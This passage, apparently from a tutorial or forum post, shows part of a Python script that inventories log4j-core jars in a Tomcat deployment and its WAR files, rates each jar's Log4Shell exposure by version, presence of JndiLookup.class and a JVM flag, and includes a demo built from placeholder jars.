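                for entry in war.namelist():
                    if entry.startswith("WEB-INF/lib/") and parse_version(entry):
                        yield f"{p.name}!{entry}", war.read(entry)


def assess(version, jndi_present, flag_set):
    """Rate one jar.  2.16.0 removed message lookups upstream; 2.15.0 and the
    system property were later documented by Apache as incomplete, so they
    only count as "partial" until the jar is upgraded."""
    if version >= (2, 16, 0):
        return "fixed"
    if not jndi_present:
        return "mitigated"      # the sledgehammer approach from the thread
    if version >= (2, 15, 0) or flag_set:
        return "partial"
    return "VULNERABLE"


def audit(root, java_opts=""):
    """Map each jar label to its status; java_opts is the JVM command line."""
    flag_set = JVM_FLAG in java_opts.split()
    return {label: assess(parse_version(label), has_jndi_lookup(data), flag_set)
            for label, data in iter_log4j_core(root)}


def build_sample_jar(version):
    """Constructed stand-in for log4j-core-<version>.jar (not a real artifact)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", f"Implementation-Version: {version}\n")
        zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")   # placeholder, not bytecode
    return buf.getvalue()


def demo(root=None):
    """Lay out a constructed deployment and audit it; returns the status map."""
    root = Path(root or tempfile.mkdtemp())
    lib = root / "lib"
    lib.mkdir(parents=True, exist_ok=True)
    for v in ("2.12.1", "2.15.0", "2.17.1"):
        (lib / f"log4j-core-{v}.jar").write_bytes(build_sample_jar(v))
    # a CAS overlay WAR whose bundled 2.12.1 jar already had the class deleted
    with zipfile.ZipFile(root / "cas.war", "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.12.1.jar",
                     strip_jndi_lookup(build_sample_jar("2.12.1")))
    return audit(root)


if __name__ == "__main__":
    for label, status in demo().items():
        print(f"{status:10s} {label}")
```

Against a real Tomcat install you would call `audit("/path/to/tomcat", java_opts=os.environ.get("CATALINA_OPTS", ""))` and treat anything other than "fixed" as a rebuild still owed; the version check deliberately comes first so that an upgraded jar is never downgraded to "mitigated" just because it still ships a (now inert) JndiLookup.class.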